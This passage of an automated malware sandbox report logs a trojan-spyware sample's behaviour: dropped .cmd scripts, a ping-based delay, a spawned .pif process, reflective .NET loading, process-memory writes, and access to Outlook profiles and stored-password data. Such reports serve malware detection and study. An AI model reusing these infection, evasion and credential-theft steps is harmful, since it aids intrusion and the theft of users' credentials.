          Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/5@3/4
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029C793C GetDiskFreeSpaceA,0_2_029C793C
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,7_2_004019F0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,7_2_004019F0
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeFile created: C:\Users\All Users\3207.cmdJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6892:120:WilError_03
          Source: C:\Users\user\Links\dajivhqI.pifCommand line argument: 08A7_2_00413780
          Source: C:\Users\user\Links\dajivhqI.pifCommand line argument: 08A7_2_00413780
          Source: C:\Users\user\Links\dajivhqI.pifCommand line argument: 08A7_1_00413780
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A47B000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A49E000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A46B000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A489000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B39D000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A4AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: y79a2l1FY5.exeVirustotal: Detection: 58%
          Source: y79a2l1FY5.exeReversingLabs: Detection: 63%
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeFile read: C:\Users\user\Desktop\y79a2l1FY5.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\y79a2l1FY5.exe "C:\Users\user\Desktop\y79a2l1FY5.exe"
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\3207.cmd""
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\19435.cmd""
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeProcess created: C:\Users\user\Links\dajivhqI.pif C:\\Users\\user\\Links\dajivhqI.pif
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\3207.cmd""Jump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\19435.cmd""Jump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeProcess created: C:\Users\user\Links\dajivhqI.pif C:\\Users\\user\\Links\dajivhqI.pifJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: url.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ???.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ???.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ???.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ????.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: tquery.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: spp.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: sppwmi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: sppcext.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: winscard.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Links\dajivhqI.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: y79a2l1FY5.exeStatic file information: File size 1948672 > 1048576
          Source: y79a2l1FY5.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x15d800
          Source: Binary string: easinvoker.pdb source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: _.pdb source: dajivhqI.pif, 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878633103.0000000000849000.00000004.00000020.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878633103.0000000000872000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\Links\dajivhqI.pifUnpacked PE file: 7.2.dajivhqI.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\user\Links\dajivhqI.pifUnpacked PE file: 7.2.dajivhqI.pif.400000.2.unpack
          Source: Yara matchFile source: 0.2.y79a2l1FY5.exe.23ce118.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.y79a2l1FY5.exe.29c0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.y79a2l1FY5.exe.23ce118.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.883239659.00000000023CE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
          Source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
          Source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
          Source: dajivhqI.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D3E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,0_2_029D3E20
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029E62A4 push 029E630Fh; ret 0_2_029E6307
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029C3210 push eax; ret 0_2_029C324C
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029E60AC push 029E6125h; ret 0_2_029E611D
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029DA018 push ecx; mov dword ptr [esp], edx0_2_029DA01D
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D606C push 029D60A4h; ret 0_2_029D609C
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029E61F8 push 029E6288h; ret 0_2_029E6280
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029E6144 push 029E61ECh; ret 0_2_029E61E4
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029C617C push 029C61BEh; ret 0_2_029C61B6
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029C617A push 029C61BEh; ret 0_2_029C61B6
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029CF600 push 029CF64Dh; ret 0_2_029CF645
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029CC498 push 029CC61Eh; ret 0_2_029CC616
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029CC486 push 029CC61Eh; ret 0_2_029CC616
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029CF4F4 push 029CF56Ah; ret 0_2_029CF562
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D2410 push ecx; mov dword ptr [esp], edx0_2_029D2412
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029CF5FF push 029CF64Dh; ret 0_2_029CF645
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029E5854 push 029E5A3Ah; ret 0_2_029E5A32
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D2EDC push 029D2F87h; ret 0_2_029D2F7F
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D2EDA push 029D2F87h; ret 0_2_029D2F7F
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029CBE18 push ecx; mov dword ptr [esp], edx0_2_029CBE1D
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D3F84 push 029D3FBCh; ret 0_2_029D3FB4
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D9FB4 push ecx; mov dword ptr [esp], edx0_2_029D9FB9
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029C5D9E push 029C5DFBh; ret 0_2_029C5DF3
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029C5DA0 push 029C5DFBh; ret 0_2_029C5DF3
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029CCDE0 push 029CCE0Ch; ret 0_2_029CCE04
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D3D40 push 029D3D82h; ret 0_2_029D3D7A
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_0041C40C push cs; iretd 7_2_0041C4E2
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_00423149 push eax; ret 7_2_00423179
